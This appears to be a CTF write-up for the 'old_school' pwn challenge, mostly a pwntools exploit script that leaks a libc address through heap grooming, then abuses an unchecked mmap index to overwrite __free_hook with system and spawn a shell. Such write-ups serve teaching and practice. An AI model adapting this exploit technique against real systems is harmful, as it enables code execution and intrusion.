[Pwn] old_school - cpt.shao xp0int Posted on Aug 28 2020

mmap edit的地方有个瞎写的检查,可以直接越界写libc上面的内容,直接改free_hook,system("/bin/sh")结束。

```python
# CTF write-up script for the "old_school" pwn challenge (binary: ./oldschool).
# Runs the target locally with no arguments, or connects to HOST PORT when two
# arguments are given. This is a linear, interactive script, not a library:
# the order of the steps matters because the heap layout depends on it.
from pwn import *
import re  # NOTE(review): unused in this script

context.terminal = ['tmux', 'splitw', '-h']
# NOTE(review): the 4-byte leak (u32) and the libc offsets further down look
# like a 32-bit libc; 'amd64' may be a leftover from a template -- confirm.
context.arch = 'amd64'
context.log_level = "debug"

env = {'LD_PRELOAD': ''}  # NOTE(review): defined but never passed to process()

# `sys` is brought into scope by `from pwn import *`.
if len(sys.argv) == 1:
    p = process('./oldschool')
elif len(sys.argv) == 3:
    p = remote(sys.argv[1], sys.argv[2])
# NOTE(review): any other argument count leaves `p` unbound, so the first
# send below raises NameError.

bp_list = []  # NOTE(review): unused

# Short aliases for the pwntools tube methods; `ru` drops the delimiter by default.
se = lambda data :p.send(data)
sa = lambda delim,data :p.sendafter(delim, data)
sl = lambda data :p.sendline(data)
sla = lambda delim,data :p.sendlineafter(delim, data)
sea = lambda delim,data :p.sendafter(delim, data)
rc = lambda numb=4096 :p.recv(numb)
ru = lambda delims, drop=True :p.recvuntil(delims, drop)
# Pad a short byte string and unpack it; str-typed '\0' padding implies Python 2.
uu32 = lambda data :u32(data.ljust(4, '\0'))
uu64 = lambda data :u64(data.ljust(8, '\0'))
info_addr = lambda tag, addr :p.info(tag + ': {:#x}'.format(addr))

# gdb.attach(p, gdbcmd)  # NOTE(review): `gdbcmd` is not defined anywhere in this script

# Menu wrappers: each sends the option number, then answers the prompts in order.
def alloc(idx, size):
    """Option 1: allocate a chunk of `size` bytes into slot `idx`."""
    sla("choice: ", "1")
    sla("Index: ", str(idx))
    sla("Size: ", str(size))

def delete(idx):
    """Option 4: free the chunk in slot `idx`."""
    sla("choice: ", "4")
    sla("Index: ", str(idx))

def show(idx):
    """Option 3: print the contents of slot `idx`."""
    sla("choice: ", "3")
    sla("Index: ", str(idx))

def edit(idx, content):
    """Option 2: overwrite the contents of slot `idx` with `content` (sent raw, no newline added)."""
    sla("choice: ", "2")
    sla("Index: ", str(idx))
    sea("Content: ", content)

def mmap_alloc(idx):
    """Option 6: create the mmap region; the prompt asks for a 'start' value."""
    sla("choice: ", "6")
    sla("start: ", str(idx))

def mmap_edit(idx, value):
    """Option 7: write `value` at element `idx` of the mmap region.

    Per the write-up, the index check in this option is wrong, so an index
    past the mapping writes outside it. The defensive fix is a bounds check of
    `idx` against the mapping's element count before the store.
    """
    sla("choice: ", "7")
    sla("Index: ", str(idx))
    sla("Value: ", str(value))

def mmap_delete():
    """Option 8: release the mmap region (unused below)."""
    sla("choice: ", "8")

# --- Step 1: heap grooming and libc leak --------------------------------------
# Nine 0x1ff-byte chunks, then free eight of them. Eight frees of one size is
# one more than a tcache bin holds, so the last one presumably reaches a
# non-tcache bin whose link pointers point into libc -- TODO confirm against
# the challenge's libc.
for i in range(0x9):
    alloc(i, 0x1ff)
for i in range(0x8):
    delete(i)
# Refill seven slots, then request a smaller chunk; presumably it is carved
# from the libc-linked chunk so show() reads back a stale libc pointer.
for i in range(0x7):
    alloc(i, 0x1ff)
alloc(7, 0x80)
show(7)
ru("Content: ")
leak_libc = u32(rc(4))  # 4-byte pointer read: 32-bit libc assumed
info_addr("leak_libc", leak_libc)

# Offsets are hard-coded for the challenge's libc build and are wrong for any other build.
libc = leak_libc - 0x1d88e0
free_hook = libc + 0x1d98d0
target = libc + 0x1d87d8  # top_chunk_addr  -- NOTE(review): computed but never used
system = libc + 0x3d250
info_addr("libc", libc)
info_addr("target", target)

# --- Step 2: out-of-bounds write through the mmap menu -----------------------
mmap_alloc(0x1000000)
# The index is expressed relative to 0xe1000000 in 4-byte units: presumably
# the address the mapping lands at and the element size -- confirm in the binary.
# `/` is integer division only under Python 2 (consistent with the str '\0'
# padding above); under Python 3 this expression yields a float.
mmap_edit((free_hook -0xe1000000)/4, system)

# --- Step 3: trigger ----------------------------------------------------------
# free() on a chunk holding "/bin/sh" now runs through the overwritten hook.
edit(0, "/bin/sh\n")
delete(0)
p.interactive()
```

打赏还是打残,这是个问题 赏 Wechat Pay Alipay 0x00 题目名称 [强网先锋] Funhash - Donek1